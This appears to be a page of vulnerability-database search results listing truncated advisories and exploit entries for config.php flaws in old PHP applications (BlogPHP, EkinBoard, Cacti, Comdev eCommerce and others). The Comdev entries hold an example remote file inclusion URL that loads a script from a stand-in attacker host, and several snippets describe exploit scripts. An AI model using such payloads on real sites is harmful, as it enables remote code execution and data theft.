662 matches found

securityvulns
added 2006/01/22 12:0 a.m. | 30 views

BlogPHP config.php SQL injection login bypass

--------------------Summary---------------- Software: BlogPHP Software's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...

AI score: 0.9
Exploits: 0
NVD
added 2005/12/31 5:0 a.m. | 13 views

CVE-2005-4686

PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregister_globals function, which allows attackers to obtain unspecified sensitive information...

CVSS: 5 | AI score: 6.4 | EPSS: 0.01192
Exploits: 0 | References: 4
CVE
added 2005/12/14 11:0 a.m. | 327 views

CVE-2005-4214

CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...

CVSS: 5 | AI score: 6.9 | EPSS: 0.01801
Exploits: 1 | References: 8 | Affected Software: 1
0day.today
added 2005/11/17 12:0 a.m. | 90 views

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

Exploit for unknown platform in category web applications ====================================================================== EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit ====================================================================== this works with magicquotesg...

AI score: 7.1
Exploits: 0
exploitpack
added 2005/11/17 12:0 a.m. | 20 views

EkinBoard 1.0.3 - config.php SQL Injection Command Execution

EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on...

AI score: 0.1
Exploits: 0
seebug.org
added 2005/11/17 12:0 a.m. | 18 views

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

No description provided by source. ?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...

AI score: 7.1
Exploits: 0
Exploit DB
added 2005/11/17 12:0 a.m. | 30 views

EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution

this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on register_globals = on Sun-Tzu: "The rising of birds in their flight is th...

AI score: 7.4
Exploits: 0
NVD
added 2005/08/10 4:0 a.m. | 18 views

CVE-2005-2544

PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...

CVSS: 5 | AI score: 7.6 | EPSS: 0.01453
Exploits: 0 | References: 5
securityvulns
added 2005/08/06 12:0 a.m. | 32 views

Comdev eCommerce config.php Vulnerability

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

AI score: 0.7
Exploits: 0
Packet Storm
added 2005/08/06 12:0 a.m. | 27 views

comdevInclusion.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

AI score: 7.4
Exploits: 0
Cvelist
added 2005/07/06 4:0 a.m. | 23 views

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

AI score: 7.1 | EPSS: 0.02306
Exploits: 0 | References: 8
UbuntuCve
added 2005/07/06 4:0 a.m. | 22 views

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

CVSS: 10 | AI score: 6 | EPSS: 0.02306
Exploits: 0 | References: 1
CVE
added 2005/07/06 4:0 a.m. | 53 views

CVE-2005-2149

CVE-2005-2149 affects Cacti

CVSS: 10 | AI score: 7.2 | EPSS: 0.02306
Exploits: 0 | References: 8 | Affected Software: 1
OSV
added 2005/07/06 4:0 a.m. | 2 views

DEBIAN-CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

CVSS: 10 | AI score: 8.2 | EPSS: 0.02306
Exploits: 0 | References: 1
Cvelist
added 2005/05/24 4:0 a.m. | 32 views

CVE-2005-1696

Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites aka NS-Multisites...

AI score: 5.7 | EPSS: 0.00901
Exploits: 0 | References: 2
NVD
added 2005/05/24 4:0 a.m. | 27 views

CVE-2005-1696

Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites aka NS-Multisites...

CVSS: 2.6 | AI score: 5.7 | EPSS: 0.00901
Exploits: 0 | References: 2
securityvulns
added 2005/04/09 12:0 a.m. | 60 views

phpBB Upload Script "up.php" Arbitrary File Upload

Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...

AI score: 0.1
Exploits: 0
CVE
added 2005/02/19 5:0 a.m. | 53 views

CVE-2004-1504

The CVE concerns Just Another Flat File (JAF) CMS 3.0RC. The vulnerability is in the displaycontent function of config.php, which allows remote attackers to gain sensitive information by supplying a blank show parameter; an error message reveals the installation path (demonstrated with index.php)...

CVSS: 5 | AI score: 6.9 | EPSS: 0.0155
Exploits: 1 | References: 3 | Affected Software: 1
securityvulns
added 2004/12/18 12:0 a.m. | 41 views

phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit

php bug in ext/standart/varunserializer.c in php 4.3.10 for dump php heap memory with phpbb2 ,who use unserialize for cookie , and found the config.phpsql password in the heap. you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp for compile / coded by overdose...

AI score: 7
Exploits: 0
securityvulns
added 2004/01/16 12:0 a.m. | 34 views

PhpDig 1.6.x: remote command execution

Product: PhpDig 1.6.x Vendor: phpdig.net Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details 4. Patches. 1. Overview. PhpDig is a http spider/search engine written in Php with a MySql database in backend. PhpDig builds a glossary...

AI score: 0.8
Exploits: 0